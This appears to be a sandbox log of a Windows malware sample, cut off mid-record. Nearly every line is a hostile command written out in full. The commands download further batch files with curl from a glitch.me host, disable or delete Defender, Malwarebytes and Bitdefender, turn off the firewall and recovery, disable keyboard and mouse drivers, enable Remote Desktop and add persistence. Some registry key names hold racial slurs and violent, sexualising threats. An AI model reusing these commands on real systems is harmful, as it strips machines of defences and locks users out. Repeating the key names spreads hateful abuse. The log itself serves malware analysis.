C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:7424
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe5⤵PID:7832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4176
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:005⤵
- Scheduled Task/Job: Scheduled Task
PID:808
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\system32\curl.execurl -o ModMenu.bat https://sky-aerial-derby.glitch.me/ModMenu.bat3⤵PID:2432
-
-
C:\Windows\system32\curl.execurl -o hig.bat https://sky-aerial-derby.glitch.me/ModMenu.bat3⤵PID:4168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\system32\openfiles.exeopenfiles4⤵PID:4332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(new-object -com shell.application).minimizeall()"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2400
-
-
C:\Windows\system32\curl.execurl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png4⤵PID:5064
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵
- Sets desktop wallpaper using registry
PID:3108
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f4⤵PID:5084
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f4⤵PID:5868
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵PID:1084
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f4⤵PID:6096
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f4⤵PID:2692
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f4⤵PID:2184
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f4⤵PID:3656
-
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵PID:5400
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f4⤵PID:5152
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f4⤵PID:3040
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5220
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:5360
-
-
C:\Windows\system32\sc.exesc config WinDefend start=disabled4⤵PID:6020
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:6108
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:1536
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:6104
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:3636
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:2144
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
PID:2544
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f4⤵PID:1792
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f4⤵PID:5752
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f4⤵
- Modifies security service
PID:1520
-
-
C:\Windows\system32\cmd.execmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"4⤵PID:5412
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f5⤵PID:592
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1416
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5516
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f4⤵PID:5772
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f4⤵PID:404
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f4⤵PID:5556
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f4⤵PID:5508
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f4⤵PID:3684
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f4⤵PID:3424
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f4⤵PID:4480
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:3160
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f4⤵PID:712
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f4⤵PID:4488
-
-
C:\Windows\system32\ReAgentc.exereagentc /disable4⤵
- Drops file in Windows directory
PID:2272
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3772
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2020
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Recovery /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4196
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4816
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
PID:5804
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue {default} recoveryenabled4⤵
- Modifies boot configuration data using bcdedit
PID:484
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f4⤵PID:896
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵PID:3040
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:1032
-
-
C:\Windows\system32\net.exenet stop "SDRSVC"4⤵PID:5220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC"5⤵PID:2320
-
-
-
C:\Windows\system32\net.exenet stop "WinDefend"4⤵PID:5376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"5⤵PID:4036
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5408
-
-
C:\Windows\system32\net.exenet stop "security center"4⤵PID:1136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"5⤵PID:1536
-
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5768
-
-
C:\Windows\system32\net.exenet stop "wuauserv"4⤵PID:5356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"5⤵PID:5384
-
-
-
C:\Windows\system32\net.exenet stop "Windows Defender Service"4⤵PID:4108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Windows Defender Service"5⤵PID:3488
-
-
-
C:\Windows\system32\net.exenet stop "Windows Firewall"4⤵PID:3652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Windows Firewall"5⤵PID:3688
-
-
-
C:\Windows\system32\net.exenet stop sharedaccess4⤵PID:5924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess5⤵PID:4344
-
-
-
C:\Windows\system32\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f4⤵PID:2008
-
-
C:\Windows\system32\reg.exeREG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:4172
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:3824
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled4⤵
- Launches sc.exe
PID:3736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableAntiTamper $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4560
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:916
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\wscsvc.dll" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4300
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbam.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3908
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MBAMService.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3644
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamtray.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM mbamscheduler.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
C:\Windows\system32\sc.exesc stop MBAMService4⤵
- Launches sc.exe
PID:3656
-
-
C:\Windows\system32\sc.exesc delete MBAMService4⤵
- Launches sc.exe
PID:3004
-
-
C:\Windows\system32\sc.exesc stop MBAMProtector4⤵
- Launches sc.exe
PID:2784
-
-
C:\Windows\system32\sc.exesc delete MBAMProtector4⤵
- Launches sc.exe
PID:3844
-
-
C:\Windows\system32\sc.exesc stop MBAMChameleon4⤵
- Launches sc.exe
PID:5068
-
-
C:\Windows\system32\sc.exesc delete MBAMChameleon4⤵
- Launches sc.exe
PID:5748
-
-
C:\Windows\system32\sc.exesc stop MBAMFarflt4⤵
- Launches sc.exe
PID:2264
-
-
C:\Windows\system32\sc.exesc delete MBAMFarflt4⤵
- Launches sc.exe
PID:3572
-
-
C:\Windows\system32\sc.exesc stop MBAMSwissArmy4⤵PID:2936
-
-
C:\Windows\system32\sc.exesc delete MBAMSwissArmy4⤵
- Launches sc.exe
PID:3192
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f4⤵PID:1352
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f4⤵PID:896
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f4⤵PID:6072
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f4⤵PID:5716
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f4⤵PID:2320
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f4⤵PID:5480
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdservicehost.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdagent.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdredline.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdparentalservice.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdreinit.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:300
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM bdsubwiz.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3652
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM seccenter.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vsserv.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epssecurityservice.exe /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6004
-
-
C:\Windows\system32\sc.exesc stop bdservicehost4⤵
- Launches sc.exe
PID:3736
-
-
C:\Windows\system32\sc.exesc delete bdservicehost4⤵
- Launches sc.exe
PID:1144
-
-
C:\Windows\system32\sc.exesc stop bdagent4⤵
- Launches sc.exe
PID:3712
-
-
C:\Windows\system32\sc.exesc delete bdagent4⤵
- Launches sc.exe
PID:2916
-
-
C:\Windows\system32\sc.exesc stop bdredline4⤵
- Launches sc.exe
PID:1580
-
-
C:\Windows\system32\sc.exesc delete bdredline4⤵
- Launches sc.exe
PID:2688
-
-
C:\Windows\system32\sc.exesc stop bdparentalservice4⤵
- Launches sc.exe
PID:3984
-
-
C:\Windows\system32\sc.exesc delete bdparentalservice4⤵
- Launches sc.exe
PID:3888
-
-
C:\Windows\system32\sc.exesc stop bdreinit4⤵
- Launches sc.exe
PID:3532
-
-
C:\Windows\system32\sc.exesc delete bdreinit4⤵
- Launches sc.exe
PID:4676
-
-
C:\Windows\system32\sc.exesc stop bdsubwiz4⤵
- Launches sc.exe
PID:4624
-
-
C:\Windows\system32\sc.exesc delete bdsubwiz4⤵
- Launches sc.exe
PID:1140
-
-
C:\Windows\system32\sc.exesc stop seccenter4⤵
- Launches sc.exe
PID:5160
-
-
C:\Windows\system32\sc.exesc delete seccenter4⤵
- Launches sc.exe
PID:5952
-
-
C:\Windows\system32\sc.exesc stop vsserv4⤵
- Launches sc.exe
PID:5736
-
-
C:\Windows\system32\sc.exesc delete vsserv4⤵PID:404
-
-
C:\Windows\system32\sc.exesc stop epssecurityservice4⤵
- Launches sc.exe
PID:3920
-
-
C:\Windows\system32\sc.exesc delete epssecurityservice4⤵
- Launches sc.exe
PID:5096
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f4⤵PID:3472
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f4⤵PID:1856
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f4⤵PID:5372
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f4⤵PID:5556
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f4⤵PID:4584
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f4⤵PID:5936
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f4⤵PID:2376
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f4⤵PID:5036
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f4⤵PID:2168
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f4⤵PID:4596
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f4⤵PID:6032
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f4⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:4860
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f4⤵PID:4532
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f4⤵PID:6120
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f4⤵PID:2316
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f4⤵PID:5696
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵PID:8
-
-
C:\Windows\system32\sc.exesc delete WinDefend4⤵
- Launches sc.exe
PID:5100
-
-
C:\Windows\system32\sc.exesc stop SecurityHealthService4⤵
- Launches sc.exe
PID:6000
-
-
C:\Windows\system32\sc.exesc delete SecurityHealthService4⤵
- Launches sc.exe
PID:5028
-
-
C:\Windows\system32\sc.exesc stop Sense4⤵
- Launches sc.exe
PID:3260
-
-
C:\Windows\system32\sc.exesc delete Sense4⤵
- Launches sc.exe
PID:4896
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MsMpEng.exe /T4⤵
- Kills process with taskkill
PID:6088
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MpCmdRun.exe /T4⤵
- Kills process with taskkill
PID:3908
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SecurityHealthSystray.exe /T4⤵
- Kills process with taskkill
PID:5084
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM smartscreen.exe /T4⤵
- Kills process with taskkill
PID:3096
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1836
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5188
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5400
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4816
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f4⤵PID:5748
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f4⤵PID:5152
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f4⤵PID:2464
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f4⤵PID:4796
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\notepad.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3068
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1352
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\calc.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5480
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4060
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2276
-
-
C:\Windows\system32\powercfg.exepowercfg /hibernate off REM Disables hibernation4⤵
- Power Settings
PID:4540
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in4⤵
- Power Settings
PID:3524
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-dc 0 REM Prevents sleep on battery4⤵
- Power Settings
PID:3740
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in4⤵
- Power Settings
PID:5992
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "Device Name"4⤵
- Power Settings
- Checks SCSI registry key(s)
PID:292
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "USB Root Hub"4⤵
- Power Settings
- Checks SCSI registry key(s)
PID:592
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f4⤵
- Adds Run key to start application
PID:2352
-
-
C:\Windows\system32\reg.exereg add "HKCR\behead all niggers" /f4⤵
- Modifies registry class
PID:6064
-
-
C:\Windows\system32\reg.exereg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f4⤵PID:320
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"4⤵PID:1792
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f4⤵
- Adds Run key to start application
PID:4608
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k4⤵PID:4108
-
C:\Windows\system32\reg.exereg query "HKU" /s /f "Software" /k5⤵PID:3560
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:3488
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:4032
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:3688
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:3420
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:5924
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:3384
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f4⤵PID:1636
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
